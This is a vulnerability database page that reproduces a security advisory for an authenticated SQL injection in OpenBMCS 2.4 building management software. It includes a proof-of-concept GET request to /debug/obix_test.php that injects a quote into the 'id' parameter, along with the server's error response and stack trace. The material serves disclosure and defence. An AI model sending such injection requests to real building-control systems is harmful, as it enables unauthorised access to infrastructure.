Vulners
Lucene search
OpenBMCS 2.4 Authenticated SQL Injection
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | OpenBMCS SQL注入漏洞 | 9 Dec 202500:00 | – | cnnvd |
 | CVE-2021-47704 | 9 Dec 202520:36 | – | cve |
 | CVE-2021-47704 OpenBMCS SQL Injection via obix_test.php | 9 Dec 202520:36 | – | cvelist |
 | EUVD-2021-34735 | 9 Dec 202521:31 | – | euvd |
 | CVE-2021-47704 | 9 Dec 202521:15 | – | nvd |
 | PT-2025-50234 | 9 Dec 202500:00 | – | ptsecurity |
 | CVE-2021-47704 | 10 Dec 202521:16 | – | redhatcve |
 | CVE-2021-47704 OpenBMCS SQL Injection via obix_test.php | 9 Dec 202520:36 | – | vulnrichment |
<html><body><p>OpenBMCS 2.4 Authenticated SQL Injection
Vendor: OPEN BMCS
Product web page: https://www.openbmcs.com
Affected version: 2.4
Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.
Desc: OpenBMCS suffers from an SQL Injection vulnerability. Input passed via
the 'id' GET parameter is not properly sanitised before being returned to the
user or used in SQL queries. This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.
Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
Apache/2.4.41 (Ubuntu)
Apache/2.4.25 (Debian)
nginx/1.16.1
PHP/7.4.3
PHP/7.0.33-0+deb9u9
Vulnerability discovered by Semen 'samincube' Rozhkov
@zeroscience
Advisory ID: ZSL-2022-5692
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5692.php
26.10.2021
--
The following PoC request demonstrates the issue (authenticated user session is required):
GET /debug/obix_test.php?id=1%22 HTTP/1.1
Host: 192.168.1.222
Cookie: PHPSESSID=ssid123ssid123ssid1234ssid
Connection: close
Response:
HTTP/1.1 200 OK
Date: Sat, 1 Jan 2022 15:09:54 GMT
Server: Apache/2.4.10 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 629
Connection: close
Content-Type: text/html; charset=UTF-8
<br/>
<b>Fatal error</b>: Uncaught exception 'PDOException' with message 'SQLSTATE[HY000]: General error: 1 unrecognized token: """' in /var/www/openBMCS/classes/dbconnection.php:146
Stack trace:
#0 /var/www/openBMCS/classes/dbconnection.php(146): PDO->query('SELECT ip_addre...')
#1 /var/www/openBMCS/php/obix/obix.functions.php(289): controllerDB->querySingle('SELECT ip_addre...', true)
#2 /var/www/openBMCS/debug/obix_test.php(16): sendObixGetTocontroller(Object(controllerDB), '1"', '/obix/config')
#3 {main}
thrown in <b>/var/www/openBMCS/classes/dbconnection.php</b> on line <b>146</b><br/>
</p></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Jan 2022 00:00Current
6Medium risk
Vulners AI Score6
CVSS 3.16.5
CVSS 48.7
EPSS0.00065
SSVC